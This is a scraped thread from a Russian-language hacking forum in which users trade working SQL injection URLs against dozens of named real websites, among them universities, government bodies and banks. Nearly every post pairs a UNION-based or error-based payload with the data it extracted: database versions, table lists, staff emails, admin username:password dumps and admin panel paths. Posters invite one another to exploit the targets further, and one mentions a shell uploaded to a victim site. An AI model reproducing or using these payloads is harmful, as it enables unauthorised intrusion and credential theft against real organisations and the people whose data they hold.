http://wch.pasco.k12.fl.us/sport.php?id=-11+UnIon+selECt+1,2,CONCAT_WS(0x3a,USER(),VERSION( ),DATABASE()),4,5,6,7,8,9,10,11,12,13,14+--+
webuser@localhost:5.1.44-community:web
PR 3
shop
https://www.srknives.com/popup_img.php?pid=-657+union+select+1,group_concat(table_name+separat or+0x7c),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+fr om+information_schema.tables+where+table_schema=0x 636172745f73726b6e697665736c6976655f636f6d--
http://www.jkteashop.com/index.php?main_page=teainfo&cate_id=2&id=-68+union+select+1,group_concat(table_name+separato r+0x7c)+from+information_schema.tables+where+table _schema=0x6a6b74656173686f5f746561--
http://www.muttugly.com/shop/product.php?id=-193+union+select+1,2,3,group_concat(column_name+se parator+0x7c),5,6,7,8,9,10+from+information_schema .columns+where+table_schema=0x746f78696374775f6d75 747475676c79+and+table_name=0x6f7264657273--
http://www.mondorecords.com/shop.php?id=-441+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37--
http://www.colemanirishmusic.com/shop/product.php?id=-11+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14--
*uNkN0Wn*
22.08.2010, 11:42
PR - 5
http://www.trentondevils.com/page.php?pid=-204+union+select+1,2,3,group_concat(email),5,6,7,8 ,9,10,11,12,13,14+from+tdevils_db.staff--
user() tdevils@localhost
version() 5.0.45
database() tdevils_db
PR - 5
http://www.easypeasy.com/guides/article.php?article=-197+union+select+1,2,group_concat(username,char(58 ),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20+from+easypeasy.hwz_users--
user() easypeasy@localhost
version() 5.0.51a-3ubuntu5.4
database() easypeasy
PR - 3
http://www.umracing.com/instructionsDetails.php?InstID=-19+union+select+1,2,3,4,5,group_concat(UserName,ch ar(58),Password),7,8,9,10,11,12,13,14+from+william oravetz_umracing.Users--
user() umracing@localhost
version() 5.0.27-log
database() williamoravetz_umracing
http://www.umracing.com/admin
Code:
http://www.black-stones.ru/restoran.php?ID=-4+union+select+1,2,3,version(),5,6,7,8--
ТИЦ10
satana-fu
22.08.2010, 14:50
PHP:
http://www.donny.co.uk/Doncaster/events/event.php?ID=-26879+union+select+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+--
http://www.donny.co.uk/Doncaster/events/event.php?ID=-26879+union+select+1,group_concat(namelc,char(58), password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23++from+phplist_admin+
PHP:
http://www.telenetholidays.com/holidays/travel.php?ID=-85+UnIon+selECt+group_concat(user(),char(58),datab ase(),char(58),version()),2,3,4+--+
moodoone
22.08.2010, 16:01
PHP:
http://www.riwcentries.com/riwc09results/printaward/labels.php?id=-1546+UnIon+selECt+1,2,concat_ws(0x3a,username,pass word)+from+users+limit+0,1--+
PHP:
http://www.channel5belize.com/archive_detail_story.php?story_id=-1+union+select+1,2,group_concat(username,char(58), password),4,5,6,7+from+admin_login--+
мебельный магазин
Code:
http://www.amadey.com/base.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),5,6,7,8,9,10,1 1,12,13,14,15,16,17,18--&p=4
недвижимость.
Code:
http://www.kvadratgroup.com/sale/base.php?act=list&obj=-6+union+select+1,2,3,4,version(),6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26--
какая-то ассоциация
Code:
http://www.theassociates.com.au/base.php?pg=jobdet&id=-87+UnIoN+SelEcT+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15--
мягкая мебель
Code:
http://www.divaninfo.ru/base.php?id=-143+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23--
мед портал
Code:
http://tutd0kt0r.ru/base.php?id=-19+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os)--&lev=0
дизайн-группа
Code:
http://www.flatart.ru/base.php?id=-20+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os)--
пластиковые окна
Code:
http://info-trocal.ru/base.php?id=-52+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os)--
мед портал
Code:
http://med-55.ru/base.php?id=-174+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os)--&lev=1
мебель-красивый сайт
Code:
http://cesorp.ru/base.php?id=-315+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os)--&lev=1
http://www.cinemagine.com/news.asp?id=37+or+(1,1)=(select+count(0),concat((s elect+version()+from+information_schema.tables+lim it+0,1),floor(rand(0)*2))from(information_schema.t ables)+group+by+2)--+
ребят молодцы, так держать
портал вне-дорожников
Code:
http://centerforstudyofpublicchoice.com/base.php?id=-668+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os)--&lev=1
музыкальный сайт\магазин (есть картон) PR-4
Code:
http://www.canyoufeelitmedia.com/master.php?page=mediaitem&id=-271+union+select+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20--
непонятный сайт ^_^
Code:
http://w3.sc-du-langage.univ-tlse2.fr/parcours-master.php?id=-105+union+select+1,2,3,4,5,6,version()--
moodoone
22.08.2010, 17:45
Code:
http://www.go-whippet.co.uk/announce.php?id=-9+UnIon+selECt+1,2,group_concat(table_name),4,5,6, 7+from+information_schema.tables+where+table_shema =database()--
-PRIVAT-
22.08.2010, 18:01
http://www.vanderveer.org.nz/personnel/person.php?id=-24+union+select+1,2,3,4,5,6,7,8,9,0,1,2+--+
PR 4
http://www.fkefir.ru/person.php?id=-2+union+select+1,2,3,4,concat_ws%280x3a,id,login,p assword%29+from+tm_admins--
PR 3 ТИЦ 235. Фруктовый Кефир - Официальный сайт группы. xD полчаса ржал
раскуривать скуль до админки я больше не буду, а то вчера какойто нехороший человек залил шелл, поэтому держите скуль сайта тайланда, раскуренную до простого юзера
Code:
http://www.cbh.moph.go.th/source/News/tor.php?id_news=-325+union+select+1,concat_ws(0x3a,user_name,user_p assword),3,4,5,6,7,8,9,10,11,12+from+user_login+--+
ну а это просто до кучи
Code:
http://www.imagesfestival.com/call.php?id=-8+union+select+1,2,3,4,user(),6,7,8,9,10,11+--+
еще одна раскуренная
Code:
http://www.pescador.online.pt/mar.php?id=-4+union+select+1,2,concat_ws(0x3a,nick,psw)+from+U sers+--+
moodoone
22.08.2010, 19:21
Code:
http://stonezone.com/article.php?id=181-999.9+union+select+1,2,3,4,5--
Code:
http://www.jakehalpern.com/article.php?id=58-999.9+union+select+1,2,3,version(),5--
Code:
http://www.jakehalpern.com/article.php?id=58-999.9+union+select+1,2,3,version(),5--
Code:
http://www.compete.pl/abstract.php?id=4-999.9+union+select+1,2,3,version()--
Code:
http://www.offix.com/career.php?ID=2-999.9+union+select+1,2,VERSION(),4--
Code:
http://www.mind-infotech.com/career.php?j_id=13-999.9+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18--
P.S.Раскручивать их не стал. Впадлу. Вы можете это сделать за меня)
http://www.bars.ru/career.php?id=-1+union+select+1,group_concat(database(),0x3a,user (),0x3a,version()),3,4,5,6,7,8,9,10,11--+
bars:bars1@localhost:4.1.25-log
PR: 3 ТИЦ: 40
http://www.kraina-z.com.ua/career.php?id=2+'+union+select+1,group_concat(vers ion(),0x3a,database()),3,4+from+information_schema .tables--+
5.0.51a-community-nt:db_kraina
http://www.bms-service.ru/press.php?id=-17+union+select+1,2,group_concat(version(),0x3a,us er())+--+
4.1.22-log:bmsservice_bms@localhost
сайт Айтишников домен ирландский
Code:
http://www.ittconference.ie/main.php?ID=2+and+1=0+union+select+1,concat_ws(0x3 a,username,password),3,4,5,6,7+from+itt_reviewer+--+
админов не трогал- показал простых юзеров, результат прячется между тегами
IT & T Conference - $username:$hash
круизный центр
НЕПТУН
http://www.neptun.ru/region/?regroup=1®ion=-2+and+1=2+union+all+select+concat_ws(char(58),@@ve rsion,user(),database(),@@version_compile_os)--
version : 5.1.32-log
user : neptun@localhost
database : neptun
os : portbld-freebsd7.1
можно поюзать....таблиц 198
/admin/
Дырочка в крупном портале
PR8
http://www.unifem.org/materials/item_detail.php?ProductID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,concat(0x3a3a,U SER())/*+
user: unifemdata@lma770.siteprotect.com
Code:
http://www.rijkheusden.nl/Content/base.php?ID=-88+UnIon+selECt+1,2,user(),4,5,6,7,8,9,10,11,12,13 ,14,15,16+--+
тИЦ — 10
PR — 4
satana-fu
23.08.2010, 02:16
скука - страшное дело
PHP:
http://www.theatreroyalwindsor.co.uk/event.php?id=-274+union+select+1,group_concat(database(),char(58 ),user(),char(58),version(),char(58),@@version_com pile_os),3+--
мне всегда нравились админские пароли в плайнтексте
Code:
http://www.eccoid.com/OURWORK/1.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,u ser_password),7,8,9,10,11,12+from+user+--+
Code:
http://www.soldatru.ru/read.php?id=-774+UNIOn+SELEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
извеняюсь что не в тему,но солдатики России жгут=)
мб кто раскрутит
Code:
http://www.dhammaweb.net/Tipitaka/read.php?id=-153+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,vers ion(),database(),user(),@@version_compile_os),9,10 ,11,12,13,14,15,16,17,18,19,20,21--
Code:
http://www.hdtinfo.com/news/read.php?id=-1157947239+union+select+1,concat_ws(0x3a,version() ,database(),user(),@@version_compile_os),3,4,5--
pr-3
Code:
http://eye.box.sk/read.php?id=-5425+union+select+1,2,3,4,5,concat_ws(0x3a,version (),database(),user(),@@version_compile_os),7--
тиц-20
pr-4
сайт бетмена
тиц 10
pr 3
Code:
http://www.adultfyi.com/read.php?ID=-21846+union+select+1,2,3,4,concat_ws(0x3a,version( ),database(),user(),@@version_compile_os),6,7,8--
немножко порнушки на ночь глядя не помешает
Code:
http://www.collegedrunkfest.com/sex.php?id=267+and+1=0+union+select+1,2,concat_ws( 0x3a,user,name),4,5+from+sexmoves+limit+3,1--+
и еще одна раскуренная
Code:
http://www.osiam.com/sex/sex.php?id=-1+union+select+1,concat_ws(0x3a,username,password) ,3,4,5+from+members+--+
http://www.townofryeny.gov/index.php?act=view_cms&id=-4+union+select+1,group_concat(0x0b,admin_id,0x3a,a dmin_name,0x3a,admin_pwd),3,4,5,6,7,8,9,10+from+ad min+--&contentFull=full
PR 4
panel: /admin/
Code:
http://www.kstw.de/index.php?option=com_presse&view=einzel&Itemid=211&Tid=-714+UNION+SELECT+concat_ws%280x3a,user%28%29,versi on%28%29,database%28%29%29,2,3,4,5,6--
Username: root@localhost
Version: 5.1.41-community
Database: internet
Google PR: 6
moodoone
23.08.2010, 15:14
Code:
http://www.ovislink.biz/tech.phtml?item_id=-593+UnIon+selECt+1,2,3,4--
Code:
http://www.globalhockey.net/news-full.php?id=-77+UnIon+selECt+1,version(),3,4,5,6,7--
daniel_1024
23.08.2010, 20:04
ПАО "Донгорбанк"
PR: 5 ТИЦ: 425
Code:
http://www.dongorbank.com/ru/press/news.php?id=43+and+1=0+union+select+1,2,version(), 4,5,6,7,8,9,10,11--
Version: 5.0.51a-24+lenny3-log
Database: wwwQHios
User: u_wwwQHios@localhost
Code:
http://globalanti.risa.ru/print.php?cat_id=31&doc_id=-172+union+select+1,2,3,concat_ws(0x3a,user_login,u ser_psw),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21+from+risa_globalanti.users+limit+1,1--
PR 5
Code:
http://gamebooks.org/show_user_reviews.php?id=-1+union+select+concat_ws(0x2b,version(),user(),@@v ersion_compile_os),2,3,4+--+
5.0.45-community+gamebooks@localhost+pc-linux-gnu's Reviews
Code:
http://gamebooks.org/show_user_reviews.php?id=-1+union+select+concat_ws(0x3a,Username,Password),2 ,3,4+from+Users--+
In plain view
потихоньку начнем
Code:
http://www.narbilisim.com/nar.php?p=haber&id=-43+union+select+concat_ws(0x3a,version(),database( ),user(),@@version_compile_os)+--+
Code:
http://myfourthirds.com/user.php?id=-2581+union+select+1,2,3,4,5,6,concat_ws(0x3a,versi on(),database(),user(),@@version_compile_os),8,9,1 0,11+--+
Code:
http://contaxg.com/user.php?id=-1167+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_ nickname,user_passwd),8,9,10,11+from+users+--+
Code:
http://www.flexelec.com/produits/detail.php?id=-28+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
Twin $park
24.08.2010, 01:57
Bank of Philippines
Mssql
http://www.bsp.gov.ph/regulations/regulations.asp?type=2+and+1=@@version--
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
http://www.bsp.gov.ph/regulations/regulations.asp?type=(select+top+1+password+from+u sers)--
users:
userID
username
password
*uNkN0Wn*
24.08.2010, 02:57
PR - 3
http://www.revisionone.com/articles/show.php?record_ID=-21+union+select+1,2,3,group_concat(User_Name,Char( 58),User_Pass),5,6,7,8+from+revisi2_goodeats.tbl_u ser--
user() revisi2_jamie@localhost
version() 5.0.90-community
database() revisi2_revisionone
Konqi : для кого антибоян? =\
satana-fu
24.08.2010, 05:33
http://e360.yale.edu/content/digest.msp?id=-2282+union+select+1,group_concat(username,char(58) ,password+separator+'%3Cbr%3E'),3,4,5,6,7+from+e36 0.users+--
..........................................
satana-fu
24.08.2010, 06:47
http://www.daawa-info.net/news.php?id=-9838+union+select+1,concat_ws(char(58),adminuser,a dminpass),3,4,5,6,7,8,9,10+from+banneradmin+--
http://www.soundofart.net/news.php?id=-53+union+select+1,concat_ws(char(58),user(),databa se(),version()),3,4,5,6,7,8,9
http://www.gachet.org/site/news.php?id=-50+union+select+concat(username,0x3a,user_password ),2,3+from+gachet_cms.phpbb_users+--
............................
*uNkN0Wn*
24.08.2010, 10:46
PR - 4
http://www.frpatb.net/index.php?rub=-107+union+select+1,group_concat(user,char(58),pass ),3+from+frpatb_net.admin_user--
user() kornog@localhost
version() 5.1.45-0.dotdeb.0
database() frpatb_net
PR - 3
http://www.endopedonline.com.ar/esp/data.php?menu=-8+union+select+1,2,3,4,5,group_concat(username,cha r(58),pass),7,8,9,10,11+from+endopedonline.users--
user() endopedonline@192.168.0.130
version() 5.0.22-max-log
database() endopedonline
-PRIVAT-
24.08.2010, 11:06
http://www.morexpertise.com/browse_articles.php?cat=-2+union+select+1--
PR 4
http://www.thejigsaw.co.ke/website/browse_articles.php?section=-22+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7% 20--
PR 4
http://www.france-israel.org/modules/print_articles.php?art_id=-650+union+select+1 --
PR 4
http://www1.alliancefr.com/modules/print_articles.php?art_id=-9419+union+select+ --
PR 5 ТИЦ 20
http://www.eto.com.ua/print_new.php?id=-802+union+select+1,version%28%29,3,4,5,6,7,8,9,0,1 ,2%20--
PR 5 ТИЦ 20
http://www.leadingfathers.info/news/print_w.php?id=-14+union+select+1,2,3,4,5,6,7,8--
PR 5
http://magprice.info/print_t.php?id=-23982+union+select+1,2,3,4,5,6,7,8--
PR 1
http://www.centrpsihoterapii.com.ua/vo.php?id=-8+union+select+1,2,3,4,5,6,7,8,9%20--
ТИЦ 10 PR 3
http://www.ptsys.ru/print_product.php?id=-5385+union+select+1,2,3,4,5,6,7,8,concat%28@i:=0x0 0,@o:=0x0d0a,benchmark%2825,@o:=CONCAT%28@o,0x0d0a ,%28SELECT+concat%28table_schema,0x2E,@i:=table_na me%29+from+information_schema.tables+WHERE+table_n ame%3E@i+order+by+table_name+LIMIT%201%29%29%29,@o %29,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4%20--
ТИЦ 150 PR 3
http://segal.ogl.ru/read.php?news_id=73+union+select+1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9--
ТИЦ 1100 PR 5
http://rabota.co.uk/index.php?p=vv&id=60+union+select+1,2,3,4,5,6,7,8,9,0--
PR 1
http://www.parta.kiev.ua/anecdot.php?id=-6+union+select+1,2,3,4,5,6,7,9,9%20--
ТИЦ 10 PR 4
http://www.thailandamulets.com/history.php?id=-12+union+select+1,2,3,4,5,6--
PR 5
http://www.rialtotheatre.com/PRINT_text.php?id=-3+union+select+1,version(),3,4,5,4,7,8,9,0,1,2,3,4 ,5,6,7,8,9,0,1--
PR 5
http://www.saudemutua.pt/print_txt.php?id=-25+union+select+1,2,3,4,concat%28@i:=0x00,@o:=0x0d 0a,benchmark%2810,@o:=CONCAT%28@o,0x0d0a,%28SELECT +concat%28table_schema,0x2E,@i:=table_name%29+from +information_schema.tables+WHERE+table_name%3E@i+o rder+by+table_name+LIMIT%201%29%29%29,@o%29,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3--
http://www.3dworks.ru/print_text.php?id=-159+union+select+1,concat%28@i:=0x00,@o:=0x0d0a,be nchmark%2880,@o:=CONCAT%28@o,0x0d0a,%28SELECT+conc at%28table_schema,0x2E,@i:=table_name%29+from+info rmation_schema.tables+WHERE+table_name%3E@i+order+ by+table_name+LIMIT%201%29%29%29,@o%29,3,4,5,6,7,8 ,9,0--
ТИЦ 30 PR 2
http://mawi-tourism.ru/print_text.php?print=&menu0=12&menu=12&id=-44+union+select+1,concat%28@i:=0x00,@o:=0x0d0a,ben chmark%28100,@o:=CONCAT%28@o,0x0d0a,%28SELECT+conc at%28table_schema,0x2E,@i:=table_name%29+from+info rmation_schema.tables+WHERE+table_name%3E@i+order+ by+table_name+LIMIT%201%29%29%29,@o%29,3,4,5,6,7,8 ,9,0,1%20--
PR 3
http://www.observatoire-laxisme-ecole.fr/print_text.php?id=-27+union+select+1,2,concat%28@i:=0x00,@o:=0x0d0a,b enchmark%2825,@o:=CONCAT%28@o,0x0d0a,%28SELECT+con cat%28table_schema,0x2E,@i:=table_name%29+from+inf ormation_schema.tables+WHERE+table_name%3E@i+order +by+table_name+LIMIT%201%29%29%29,@o%29,4,5,6,7,8, 9%20--
PR 3
http://www.omkatalog.ru/print_text.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10%20--
moodoone
24.08.2010, 16:14
Code:
http://www.ber.te.ua/cgi-bin/viche/index.cgi?archive=-20060721+UnIon+selECt+1,2,3,4,table_name,6,7,8,9+f rom+information_schema.tables--+
Кто раскрутит до конца стукните плиз в ПМ
http://www.drugreg.ru/Doc/DocDownload.asp?idPage=51[SQL INJECTION]
Version: Microsoft
SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TA BLES+WHERE+TABLE_NAME+NOT+IN+('UserQuerysDoc','Cou ntClicksLink','bnr_clicks','bnr_contains','bnr_mai n','bnr_owners','bnr_types','DownloadFiles','Downl oadFilesWebPages','Downloads','DownloadsSent','Dow nloadTypes','DownloadTypesWebPages','DownloadWebPa ges','dtproperties','GeoAreas','GeoCountryType','G eoRegions','MailSendOk','SendMailOnce','SendMailOn ceWhat','SendUnitTypes','Services','ServiceTypes', 'ServiceTypesSend','ServiceTypesSendLog','sysconst raints','syssegments','UserQuerys','UserQueryTypes ','UserQueryTypesMain','Users','UsersLog','UsersMs g','UsersMsgSent','UsersMsgSent_Dubl','UsersServic es','UsersUserType','UserTypes')
http://www.weblaw.edu.au/display_resource.phtml?rid=3366%27+or+%281,1%29=%2 8select+count%280%29,concat%28%28select+concat%28e d_username,char%2858%29,ed_password%29+from+editor +limit+0,1%29,floor%28rand%280%29*2%29%29from%28in formation_schema.tables%29+group+by+2%29--+
PR-6
-----
http://www.stopthinkdo.com/display_article.phtml?article_id=6+and+substring(v ersion(),1,1)=3
-----
http://www.icmi.com.au/resource.phtml?id=-13+union+select+1,2,3,4,5,version()
------
http://www.cafeproductsdirect.com.au/listing.phtml?expand=1&selected=118+union+select+1,2,version(),4,5
*uNkN0Wn*
24.08.2010, 17:05
PR - 5
http://experts.uwaterloo.ca/experts.php?id=-40+union+select+group_concat(email),2+from+cpa_exp erts.users+--+
user() cpa_experts@strobe.uwaterloo.ca
version() 5.0.85-community-log
database() cpa_experts
http://calendar.uwaterloo.ca/event?id=-4431+union+select+1,group_concat(email),3,4,5,6,7, 8,9,10,11,12+from+cpa_calendar.users+--+
user() cpa_calendar@strobe.uwaterloo.ca
version() 5.0.85-community-log
database() cpa_calendar
http://www.library.uq.edu.au/hotnews/index.phtml?id=63'or+(1,1)=(select+count(0),concat ((select+version()+from+information_schema.tables+ limit+0,1),floor(rand(0)*2))from(information_schem a.tables)+group+by+2)--+
PR-7
-PRIVAT-
24.08.2010, 18:21
http://www.funiculars.net/line.php?id=-85+union+select+1,2,3,4,concat%28@i:=0x00,@o:=0x0d 0a,benchmark%2810,@o:=CONCAT%28@o,0x0d0a,%28SELECT +concat%28table_schema,0x2E,@i:=table_name%29+from +information_schema.tables+WHERE+table_name%3E@i+o rder+by+table_name+LIMIT%201%29%29%29,@o%29,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5--
PR 3
*uNkN0Wn*
24.08.2010, 18:41
PR - 6
http://sju.ca/courses/faculty.php?unit=-18+union+select+group_concat(email+separator+'%3Cb r%3E')+from+sjudb.events+--+
независимая консалтинговая группа
2К Аудит-Деловые консультации
http://www.2kaudit.ru/services.php?id=-153+and+1=2+union+all+select+1,2,3,concat_ws(0x3a, @@version,user(),database(),@@version_compile_os), 5,6,7,8,9,10,11,12,13,14,15--+
version : 4.0.27-log
user : 2kaudit-ru@fhe2.hoster.ru
database : 2kaudit-ru
os : portbld-freebsd7.0
Code:
list-a-day.com/?Gamequarium&id=-868+or 1=0+union select 1,version(),3,4,5,6--
Mysql=5
Кто сможет обойти WAF просьба отписать в ПМ
[Feldmarschall]
25.08.2010, 02:25
BANK OF LEBANON (Banque du Liban)
Code:
http://www.bdl.gov.lb/edata/subseries.asp?SIID=13+union+select+1,2,3,4,5,6,7,8 +from+MSysAccessXML
*uNkN0Wn*
25.08.2010, 12:37
PR - 5
http://www.socialistreview.org.uk/article.php?articlenumber=-8609+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group _concat(name,char(58),password),14,15,16,17,18,19, 20,21+from+srdb01.auth+--+
user() srdb01@195.8.80.54
version() 5.0.77-log
database() srdb01
www.socialistreview.org.uk/admin
PR - 2
http://www.nerdrium.com/article.php?articleNumber=-26+union+select+group_concat(userName,char(58),enc Pass)+from+nerdriu_tricitycc.members+--+
user() nerdriu_grfnkmp@localhost
version() 5.0.89-community
database() nerdriu_nerdrium
Мониторинг обменных пунктов
http://wmrates.net/detail.php?xobmen=60+union+select+1,version(),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17
*uNkN0Wn*
25.08.2010, 16:01
PR - 4
http://www.desilassi.com/AtoZ.php?lid=-1+union+select+1,group_concat(username,char(58),pa ssword),3,4+from+administration_users--
user() dbo316503927@74.208.180.21
version() 5.0.81-log
database() db316503927
desilassi.com/admin
PR - 3
http://extremebodyshaping.com/locations_main.php?lid=-12+union+select+1,group_concat(UserName,char(58),U serPwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21+from+users--
user() extremebodyshapi@localhost
version() 5.0.22
database() extremebodyshaping
extremebodyshaping.com/admin
http://www.zenithchambers.co.uk/about_details.php?lid=-9+union+select+1,group_concat(username),3,4,5,6+fr om+users+--+
Всё что вывел
Marsipan
25.08.2010, 16:02
Code:
http://www.smdailyjournal.com/article_preview.php?title=DA:&id=-1+and+1=0+union+select+1,2,concat_ws(0x3a3a3a,vers ion(),database(),user()),4,5,6,7,8,9,10,11,12,13,1 4,15--
4.0.25:::smdaily2:::smdaily2@localhost
Code:
http://www.bilet-da.ru/best.php?id=-1+and+1=0+union+select+1,2,concat_ws(0x3a3a3a,vers ion(),database(),user()),4,5,6,7,8,9,10,11,12,13,1 4,15--
5.0.77:::biletda_ru:::biletdaru@localhost
Code:
http://www.dilhaidesi.com/lyrics/song.php?name=Ja%20Ni%20Tera%20Pyar%20Kudey&movie=Captain%20Bhangre%20Da&id=-1+union+select+1,2,3,4,5,concat_ws(0x3a3a3a,versio n(),database(),user())--
5.1.33:::dilhaidesi_main:::dilhaidesi_main@localho st
Code:
http://www.biletda.ru/best.php?id=-1+and+1=0+union+select+1,2,concat_ws(0x3a3a3a,vers ion(),database(),user()),4,5,6,7,8,9,10,11,12,13,1 4,15--
5.0.77:::biletda_ru:::biletdaru@localhost
*uNkN0Wn*
25.08.2010, 16:37
PR - 3
http://www.kandahar-taos.com/property-detail.php?lid=-15+union+select+1,2,group_concat(username,char(58) ,password),4,5,6,7,8+from+admin--
user() kandahar@localhost
version() 5.0.82sp1
database() kandahar
gazprom
http://www.msk-tr.gazprom.ru/news/jubilee/item.php?jubileeID=-43+union+select+1,2,3,4,group_concat(login,0x3A,pa ssword+SEPARATOR+0x0b),6,7,8,9+FROM+mtg131_main.us ers--
Информация для модераторов. Первый раз когда я выкладывал эту скуль. там был MySQL 4. и таблицы были несбручены. Сейчас они обновились теперь у них MySQL 5*. Вобщем вот. раскрученная скуль.
http://stim-parquet.ru/newspod.php?id=25&table=news_sait+where+1=2+union+select+1,concat_ws (0x3a,version(),user(),database()),3,4,5,6,7,8,9,1 0,11,12,13,14+from+st_news_sait
shop
http://www.artsmia.org/viewer/detail.php?id=548&i=1&v=911.911+union+ALL+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,group_concat(version(),0x3a,database( ),0x3a,user()),17,18,19+--+
http://www.rsapc.com/projects/detail.php?id=-174+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2--+++
Marsipan
26.08.2010, 00:30
voiturembeep@10.0.45.89:::voiturembeep:::5.0.90-log::
Code:
http://www.mpac.org/article.php?id=-725'+union+select+1,concat_ws(0x3a,user(),0x3a,dat abase(),0x3a,version(),0x3a),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23%23
Sanilulu_nigeria@localhost:::sanilulu_nff:::5.0.91-community::
Code:
http://www.nigeriaff.com/Newsdisplay.php?ID=-167+union+select+1,concat_ws(0x3a,user(),0x3a,data base(),0x3a,version(),0x3a),3,4,5,6,7,8,9,10,11
[/B]
cantbkbat@boscgi0502.eigbox.net:::ntbkca:::5.0.51a-log::
Code:
http://www.battery-notebook.ca/info.php?pid=-5305'+union+select+1,2,3,4,concat_ws(0x3a,user(),0 x3a,database(),0x3a,version(),0x3a),6,7,8,9,10,11, 12,13,14,15,16,17,18,19%23
ithink@localhost:::ithinkmusic:::5.0.77::
Code:
http://dubkraftrecords.ithinkmusic.com/my-store/detail.php?r=-12039/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user(),0x3a,database(),0x3a,versi on(),0x3a),3,4,5,6,7,8,9%23
[/B]
http://www.digitalpodcast.com/detail.php?id=-19468+union+select+version(),2,3--
[Feldmarschall]
26.08.2010, 01:46
Bank of the Lao P.D.R.
Code:
http://www.bol.gov.la/english/news_report.php?nid=-42+union+select+1,concat_ws(0x3a,version(),user(), database(),cast(user as char),cast(password as char)),3,4,5,6,7,8+from+mysql.user--
p.s file_priv Y
Ну что, сиди- не сиди а начинать надо... Поддержим товарищей и пройдемся по банкам
Banque Atlantique
Code:
http://www.banqueatlantique.net/index.php?parcours=article&rubrique=-1+union+select+1,2,concat_ws(0x3a,admin,password), 4,concat_ws(0x3a,version(),database(),user(),@@ver sion_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,1 8+from+webuser+--+
Marsipan
26.08.2010, 03:12
PR - 3
Code:
http://www.kandahar-taos.com/property-detail.php?lid=-15+union+select+1,2,group_concat(username,char(58) ,password),4,5,6,7,8+from+admin--
user() kandahar@localhost
version() 5.0.82sp1
database() kandahar
PR - 3
Code:
http://extremebodyshaping.com/locations_main.php?lid=-12+union+select+1,group_concat(UserName,char(58),U serPwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21+from+users--
user() extremebodyshapi@localhost
version() 5.0.22
database() extremebodyshaping
Code:
extremebodyshaping.com/admin
pr 4
Code:
http://www.desilassi.com/AtoZ.php?lid=-1+union+select+1,group_concat(username,char(58),pa ssword),3,4+from+administration_users--
user() dbo316503927@74.208.180.21
version() 5.0.81-log
database() db316503927
Code:
desilassi.com/admin
продолжим банковскую тему
Banque BEMO
Code:
http://www.bemobank.com/bemo.php?id1=-12+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4+--+
Code:
http://www.unar.fr/pgs/news.php?id=-21+union+select+1,2,3,4,5,6,group_concat%28table_n ame+separator+0x3a%29,8,9,10,11,12,13,14,15,16+fro m+information_schema.tables+where+table_schema=0x6 36d323330363737+--+
Code:
